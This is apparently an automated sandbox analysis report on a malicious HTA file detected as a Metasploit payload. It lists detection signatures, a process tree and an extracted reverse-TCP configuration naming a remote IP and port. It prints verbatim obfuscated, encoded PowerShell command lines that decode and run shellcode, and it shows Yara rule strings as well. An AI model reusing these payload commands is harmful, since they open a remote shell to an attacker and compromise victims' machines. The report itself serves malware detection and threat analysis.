Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.hta

Overview

General Information

Sample name:na.hta
Analysis ID:1534778
MD5:80d63e57cf21fda8b8c90e474eb46a4a
SHA1:ca838f1b1972ceefbeda106c0f201a87d3d8a5c9
SHA256:23d30acfa7336b1bcd1a62a2225f1ad2c2f82f683cf70041874bb9ecfad9dfec
Tags:htauser-abuse_ch
Infos:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected MetasploitPayload
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6304 cmdline: mshta.exe "C:\Users\user\Desktop\na.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4800 cmdline: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"Type": "Metasploit Connect", "IP": "86.104.74.31", "Port": 1911}
SourceRuleDescriptionAuthorStrings
na.htaSusp_PowerShell_Sep17_2Detects suspicious PowerShell script in combo with VBS or JS Florian Roth
  • 0x143:$x1: .Run "powershell.exe -nop -w hidden -e
  • 0x105:$x2: FileExists(path + "\..\powershell.exe")
  • 0x1f:$x3: window.moveTo -4000, -4000
  • 0x4c:$s1: = CreateObject("Wscript.Shell")
SourceRuleDescriptionAuthorStrings
00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
    00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmpMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
    • 0x4bd0:$s1: kernel32.dll WaitForSingleObject),
    • 0x40c6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
    • 0x457e:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
    • 0x462c:$s5: = [System.Convert]::FromBase64String(
    • 0x42f3:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
    • 0x44d8:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
    00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_4a1c4da8Identifies Metasploit 64 bit reverse tcp shellcode.unknown
      • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
      00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        amsi32_4800.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security
          amsi32_4800.amsi.csvMsfpayloads_msf_refMetasploit Payloads - file msf-ref.ps1Florian Roth
          • 0xb453:$s1: kernel32.dll WaitForSingleObject),
          • 0xa930:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
          • 0xadf5:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
          • 0xaea8:$s5: = [System.Convert]::FromBase64String(
          • 0xab64:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
          • 0xad4e:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())), CommandLine: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6
          Source: Process startedAuthor: John Lambert (rule): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBK